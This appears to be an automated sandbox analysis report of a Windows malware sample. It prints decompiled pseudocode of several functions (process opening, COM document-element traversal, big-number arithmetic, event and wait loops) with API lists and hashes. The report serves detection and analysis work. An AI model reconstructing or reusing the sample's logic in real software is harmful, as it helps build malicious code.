__lock.LIBCMT ref: 6E280175

Part of subcall function 6E281B7E: __mtinitlocknum.LIBCMT ref: 6E281B94
Part of subcall function 6E281B7E: __amsg_exit.LIBCMT ref: 6E281BA0
Part of subcall function 6E281B7E: RtlEnterCriticalSection.NTDLL(?), ref: 6E281BA8

___sbh_find_block.LIBCMT ref: 6E280180
___sbh_free_block.LIBCMT ref: 6E28018F
HeapFree.KERNEL32(00000000,?,6E2B1A28,0000000C,6E281B5F,00000000,6E2B1AF8,0000000C,6E281B99,?,?,?,6E287A94,00000004,6E2B1E48,0000000C), ref: 6E2801BF
GetLastError.KERNEL32(?,6E287A94,00000004,6E2B1E48,0000000C,6E2858CA,?,?,00000000,00000000,00000000,?,6E2832B9,00000001,00000214), ref: 6E2801D0

Memory Dump Source

Source File: 00000000.00000002.480497623.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 43b6cb95d3a342972afe3f806825d3c765e6bb06c5465f6990c725fcb3ef5791
Instruction ID: 48100bff18a6f937f6a66da222a3e7c6ac3e52cedfd87f83b3d3c8026edd1db1
Opcode Fuzzy Hash: 43b6cb95d3a342972afe3f806825d3c765e6bb06c5465f6990c725fcb3ef5791
Instruction Fuzzy Hash: E1018F3581661AABEB205BF19808F8F377AAF01766F240908E855661C0EB34958CCA65

Uniqueness

Uniqueness Score: -1.00%

Function 001D14CE, Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001D14CE(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x1dd26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x1dd25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x1dd258 = _t6;
					 *0x1dd264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x1dd254 = _t7;
					if(_t7 == 0) {
						 *0x1dd254 =  *0x1dd254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}

0x001d14d6
0x001d14dc
0x001d14e3
0x00000000
0x001d153d
0x001d14e5
0x001d14ed
0x001d14fa
0x001d14fa
0x001d153a
0x00000000
0x001d153a
0x001d14fc
0x001d14fc
0x001d1501
0x001d1513
0x001d1518
0x001d151e
0x001d1524
0x001d152b
0x001d152d
0x001d152d
0x00000000
0x001d1534
0x001d14f6
0x00000000
0x00000000
0x001d14f8
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001D5274,?,?,00000001,?,?,?,001D647E,?), ref: 001D14D6
GetVersion.KERNEL32(?,00000001,?,?,?,001D647E,?), ref: 001D14E5
GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,001D647E,?), ref: 001D1501
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,001D647E,?), ref: 001D151E
GetLastError.KERNEL32(?,00000001,?,?,?,001D647E,?), ref: 001D153D

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: c0fc077cd6c45d6707033d5f270d7877d58f1df05a5aa513563eb6e39557dc80
Instruction ID: 4f32930625e9b633bef84d4a3628bde9f3df48e426c8d5cf0db6866db7559bbd
Opcode Fuzzy Hash: c0fc077cd6c45d6707033d5f270d7877d58f1df05a5aa513563eb6e39557dc80
Instruction Fuzzy Hash: 93F08C74647302FBDB249B24BC19B143B61A781741F50491BF543C76E0D774D482CB14

Uniqueness

Uniqueness Score: -1.00%

Function 6E27DE60, Relevance: 6.3, APIs: 4, Instructions: 282COMMON

Download Yara Rule

APIs

_realloc.LIBCMT ref: 6E27DF3A
_realloc.LIBCMT ref: 6E27DFD8
_realloc.LIBCMT ref: 6E27E07F

Memory Dump Source

Source File: 00000000.00000002.480497623.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false

Similarity

API ID: _realloc
String ID:
API String ID: 1750794848-0
Opcode ID: 788af7bb6f71f44278ef0184b89523640159d0c4a9c8655d359240f93e97bc90
Instruction ID: 19f2b1a2b5698bc030be2fc73ed7dce36b8fc381ca51285812ab337135a87560
Opcode Fuzzy Hash: 788af7bb6f71f44278ef0184b89523640159d0c4a9c8655d359240f93e97bc90
Instruction Fuzzy Hash: FCB1D4B46147099FD724CFA9C880A9ABBF2FF4A314F444A2DD48987751D730E949CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E27CE60, Relevance: 6.2, APIs: 4, Instructions: 176COMMON

Download Yara Rule

APIs

_realloc.LIBCMT ref: 6E27CEFD
_realloc.LIBCMT ref: 6E27CF3E
_realloc.LIBCMT ref: 6E27CF81
_realloc.LIBCMT ref: 6E27CFC3

Memory Dump Source

Source File: 00000000.00000002.480497623.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false

Similarity

API ID: _realloc
String ID:
API String ID: 1750794848-0
Opcode ID: 3b0be5b34c3f7846ca78056c90f01374ff4e9c645da4d9f8a9b9701259980688
Instruction ID: eea659fa5252c56da36562e97aeb9adf6a4a0343bf46934ec0db13067a55d300
Opcode Fuzzy Hash: 3b0be5b34c3f7846ca78056c90f01374ff4e9c645da4d9f8a9b9701259980688
Instruction Fuzzy Hash: 857105B5A14B058FD760CF69C480A56FBF6FF49310B508A2ED48A8BA51E770F946CF90

Uniqueness

Uniqueness Score: -1.00%

Function 001D5E3C, Relevance: 6.2, APIs: 4, Instructions: 154
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E001D5E3C(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x1dd2a4; // 0x2dca5a8
					_t5 = _t103 + 0x1de038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x1dc2b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x1dd2a4; // 0x2dca5a8
												_t28 = _t109 + 0x1de0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x1dd2a4; // 0x2dca5a8
														_t33 = _t79 + 0x1de078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}

0x001d5e41
0x001d5e4a
0x001d5e4b
0x001d5e4f
0x001d5e55
0x001d5e5b
0x001d5e64
0x001d5e6a
0x001d5e74
0x001d5e76
0x001d5e7c
0x001d5e81
0x001d5e8c
0x001d5e92
0x001d5e97
0x001d5fb9
0x001d5e9d
0x001d5e9d
0x001d5eaa
0x001d5eb0
0x001d5eb6
0x001d5eba
0x001d5ec0
0x001d5ecd
0x001d5ed1
0x001d5ed7
0x001d5eda
0x001d5ee2
0x001d5ee3
0x001d5ee7
0x001d5eeb
0x001d5eee
0x001d5ef1
0x001d5ef7
0x001d5f00
0x001d5f06
0x001d5f07
0x001d5f0a
0x001d5f0b
0x001d5f0c
0x001d5f14
0x001d5f15
0x001d5f16
0x001d5f18
0x001d5f1c
0x001d5f20
0x00000000
0x00000000
0x001d5f26
0x001d5f2f
0x001d5f35
0x001d5f3f
0x001d5f43
0x001d5f45
0x001d5f52
0x001d5f56
0x001d5f5e
0x001d5f63
0x001d5f75
0x001d5f77
0x001d5f7d
0x001d5f7d
0x001d5f86
0x001d5f86
0x001d5f88
0x001d5f8e
0x001d5f8e
0x001d5f91
0x001d5f97
0x001d5f9a
0x001d5fa3
0x00000000
0x00000000
0x00000000
0x001d5fa3
0x001d5ef7
0x001d5ef1
0x001d5eda
0x001d5fa9
0x001d5fa9
0x001d5faf
0x001d5faf
0x001d5fb5
0x001d5fb5
0x001d5fbe
0x001d5fc4
0x001d5fc4
0x001d5e81
0x001d5fcd

APIs

SysAllocString.OLEAUT32(001DC2B0), ref: 001D5E8C
lstrcmpW.KERNEL32(00000000,0076006F), ref: 001D5F6D
SysFreeString.OLEAUT32(00000000), ref: 001D5F86
SysFreeString.OLEAUT32(?), ref: 001D5FB5

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 6e1a77d133a713fbe43b0e0a3e8b13fdbaf04d923e7626e3660dda69d3e77d67
Instruction ID: 2bef711535d478058dd313f7902edff8f8569d59e62218d6c8ec92302f8fcb94
Opcode Fuzzy Hash: 6e1a77d133a713fbe43b0e0a3e8b13fdbaf04d923e7626e3660dda69d3e77d67
Instruction Fuzzy Hash: 53514C75D0051AEFCB00DFA8C8889AEB7BAEF88705B14499AF915EF350D7319D41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001D5349, Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 001D5384
SysFreeString.OLEAUT32(00000000), ref: 001D5469

Part of subcall function 001D5E3C: SysAllocString.OLEAUT32(001DC2B0), ref: 001D5E8C

SafeArrayDestroy.OLEAUT32(00000000), ref: 001D54BC
SysFreeString.OLEAUT32(00000000), ref: 001D54CB

Part of subcall function 001D6872: Sleep.KERNEL32(000001F4), ref: 001D68BA

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroySafeSleep
String ID:
API String ID: 3193056040-0
Opcode ID: a2a3f9b2b2dc0a2d6ea844ffb3a1547c0c4ddaa09ec130f2ccc6b6564986ec3b
Instruction ID: a0cd87edd3fa046f2b4e5df6b36043eae669ea9323ebb347acd501eac751d78d
Opcode Fuzzy Hash: a2a3f9b2b2dc0a2d6ea844ffb3a1547c0c4ddaa09ec130f2ccc6b6564986ec3b
Instruction Fuzzy Hash: A7514035500A09EFDB01DFA8C844A9EB7BAFF88751F14842AE905DB320EB75DD85CB51

Uniqueness

Uniqueness Score: -1.00%

Function 001D8D85, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E001D8D85(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E001D8483(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E001DA60F(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E001D2215(_t101,  &_v236, _a8, _t96 - _t81);
					E001D2215(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E001DA60F(_t101, 0x1dd1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E001DA60F(_a16, _a4);
						E001DA624(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L001DB078();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L001DB072();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E001D4607(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E001D5151(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E001D6911(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x1dd1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x001d8d88
0x001d8d94
0x001d8d9a
0x001d8d9f
0x001d8da3
0x001d8f00
0x001d8f04
0x001d8f04
0x001d8da9
0x001d8dad
0x001d8db1
0x001d8db4
0x001d8dbf
0x001d8dc5
0x001d8dca
0x001d8dcd
0x001d8de7
0x001d8df3
0x001d8dfc
0x001d8e06
0x001d8e0b
0x001d8e0d
0x001d8e10
0x001d8ebe
0x001d8ec4
0x001d8ed5
0x001d8ee8
0x001d8ef8
0x00000000
0x001d8efd
0x001d8e19
0x001d8e20
0x001d8e24
0x001d8e2a
0x001d8e2c
0x001d8e2e
0x001d8e30
0x001d8e32
0x001d8e3c
0x001d8e41
0x001d8e43
0x001d8e45
0x001d8e46
0x001d8e47
0x001d8e48
0x001d8e4f
0x001d8e56
0x001d8e59
0x001d8e59
0x001d8e26
0x001d8e26
0x001d8e26
0x001d8e61
0x001d8e69
0x001d8e72
0x001d8e77
0x001d8e77
0x001d8e7c
0x00000000
0x00000000
0x001d8e7e
0x001d8e81
0x001d8e8b
0x00000000
0x00000000
0x001d8e8d
0x001d8e8d
0x001d8e97
0x001d8e77
0x001d8e7c
0x00000000
0x00000000
0x00000000
0x001d8e7c
0x001d8ea1
0x001d8ea4
0x001d8ea7
0x001d8eae
0x001d8eae
0x001d8ebb
0x00000000
0x001d8ebb
0x001d8db6
0x001d8dba
0x001d8dbb
0x001d8dbd
0x00000000
0x00000000
0x00000000
0x001d8dbd
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 001D8E32
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 001D8E48
memset.NTDLL ref: 001D8EE8
memset.NTDLL ref: 001D8EF8

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: cd1d83a163552ba2e5caa388221e56358e764419aade89ea876987b4f8cfa0cb
Instruction ID: d322d1604aaa9150729d85758d9d4e4286d571d746191b7ca97b02745fc0b4c3
Opcode Fuzzy Hash: cd1d83a163552ba2e5caa388221e56358e764419aade89ea876987b4f8cfa0cb
Instruction Fuzzy Hash: 05419131A00259ABDF10DFA8DC81BEE7775EF55710F10852AF91AA7381EB70AE54CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001DA961, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000008,74B04D40), ref: 001DA973

Part of subcall function 001D7E20: RtlAllocateHeap.NTDLL(00000000,00000000,001D8112), ref: 001D7E2C

ResetEvent.KERNEL32(?), ref: 001DA9E7
GetLastError.KERNEL32 ref: 001DAA0A
GetLastError.KERNEL32 ref: 001DAAB5

Part of subcall function 001DA5FA: HeapFree.KERNEL32(00000000,00000000,001D81B4,00000000,?,?,00000000), ref: 001DA606

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
String ID:
API String ID: 943265810-0
Opcode ID: 89a975f25b5d1c000e7193cf3d45678d04999f4ba31f338ac8f144e51f9851ab
Instruction ID: c19a3ff1cac272f9265d21576a955e9bff805a6d71fa75d9882093f708ad5506
Opcode Fuzzy Hash: 89a975f25b5d1c000e7193cf3d45678d04999f4ba31f338ac8f144e51f9851ab
Instruction Fuzzy Hash: 5A418C71501205BFDB31DFA1DD88E6B7BBDEF98700B104A2AF543D26A0E731A984CB61

Uniqueness

Uniqueness Score: -1.00%

Function 001D12F8, Relevance: 6.1, APIs: 4, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E001D12F8(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				void* _t30;
				intOrPtr _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					_push( &_v8);
					_push(4);
					_push( &_v20);
					_push( *((intOrPtr*)(_t69 + 0x18)));
					if( *0x1dd138() != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x1dd168(0, 1,  &_v12);
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E001D7E20(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_push( &_v8);
										_push(0x1000);
										_push(_v16);
										_push( *((intOrPtr*)(_t69 + 0x18)));
										if( *0x1dd138() != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E001D66BA( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E001DA5FA(_v16);
										if(_t64 == 0) {
											_t64 = E001D49F6(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E001D66BA( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E001D5053(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}

0x001d12f8
0x001d12f9
0x001d12ff
0x001d130a
0x001d130a
0x001d130c
0x001d1950
0x001d1955
0x001d1957
0x001d195c
0x001d195d
0x001d1962
0x001d1963
0x001d196e
0x001d199f
0x001d19a4
0x001d1a67
0x001d19aa
0x001d19b1
0x001d19b9
0x001d1a64
0x001d19bf
0x001d19c4
0x001d19c9
0x001d19ce
0x001d1a56
0x001d19d4
0x001d19d4
0x001d19d6
0x001d19dc
0x001d19dd
0x001d19dd
0x001d19e0
0x001d19e3
0x001d19e9
0x001d19ee
0x001d19ef
0x001d19f4
0x001d19f7
0x001d1a02
0x00000000
0x00000000
0x001d1a0a
0x001d1a12
0x001d1a1e
0x001d1a22
0x001d1a24
0x001d1a29
0x00000000
0x00000000
0x001d1a29
0x001d1a22
0x001d1a3b
0x001d1a3e
0x001d1a45
0x001d1a50
0x001d1a50
0x00000000
0x001d1a2b
0x001d1a2b
0x001d1a30
0x001d1a32
0x001d1a33
0x001d1a36
0x00000000
0x001d1a36
0x00000000
0x001d1a30
0x001d19dd
0x001d1a57
0x001d1a57
0x001d1a5d
0x001d1a5d
0x001d19b9
0x001d1970
0x001d1976
0x001d197e
0x001d1997
0x001d1999
0x00000000
0x00000000
0x001d1980
0x001d198a
0x001d198e
0x001d1994
0x00000000
0x001d1994
0x001d198e
0x001d197e
0x001d1a70
0x001d1301
0x001d1301
0x001d1308
0x001d1313
0x00000000
0x00000000
0x00000000
0x001d1308

APIs

ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74B481D0), ref: 001D1957
GetLastError.KERNEL32(?,?,?,00000000,74B481D0), ref: 001D1970
ResetEvent.KERNEL32(?), ref: 001D19E9
GetLastError.KERNEL32 ref: 001D1A04

Part of subcall function 001D5053: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 001D506A
Part of subcall function 001D5053: SetEvent.KERNEL32(?), ref: 001D507A

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: Event$ErrorLastReset$ObjectSingleWait
String ID:
API String ID: 1123145548-0
Opcode ID: 45c9108e4ac3076f85b3aee1ffed95ae22f52bc6ef1e69dad0fe6076ab48d2d0
Instruction ID: e230af4ad366340d306c0ea9ee9a33e9752a046265dce303355e90b52505f9d0
Opcode Fuzzy Hash: 45c9108e4ac3076f85b3aee1ffed95ae22f52bc6ef1e69dad0fe6076ab48d2d0
Instruction Fuzzy Hash: F041D232601600BFCB219BA4CC40AAEB7BAEF94364F154926F11193290EB70ED42DB50

Uniqueness

Uniqueness Score: -1.00%

Function 001D8C8E, Relevance: 6.1, APIs: 4, Instructions: 96
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E001D8C8E(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x1dd270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x1dd2a4; // 0x2dca5a8
				_t3 = _t8 + 0x1de862; // 0x61636f4c
				_t25 = 0;
				_t30 = E001D64A0(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x1dd2a8, 1, 0, _t30);
					E001DA5FA(_t30);
				}
				_t12 =  *0x1dd25c; // 0x2000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E001D7F56() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E001D4EEC(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x1dd110( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E001D4359(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

0x001d8c8f
0x001d8c96
0x001d8ca0
0x001d8ca4
0x001d8caa
0x001d8cb9
0x001d8cc0
0x001d8cc4
0x001d8cd6
0x001d8cd8
0x001d8cd8
0x001d8cdd
0x001d8ce4
0x001d8d3b
0x001d8d3b
0x001d8d41
0x001d8d43
0x001d8d43
0x001d8d4d
0x001d8d51
0x001d8d63
0x001d8d63
0x001d8d67
0x001d8d6d
0x001d8d6d
0x00000000
0x001d8cfd
0x001d8d02
0x001d8d0a
0x001d8d0e
0x001d8d12
0x001d8d12
0x001d8d1f
0x001d8d23
0x001d8d27
0x001d8d7c
0x001d8d82
0x001d8d82
0x001d8d35
0x001d8d39
0x001d8d70
0x001d8d72
0x001d8d75
0x001d8d75
0x00000000
0x001d8d72
0x001d8d39
0x00000000
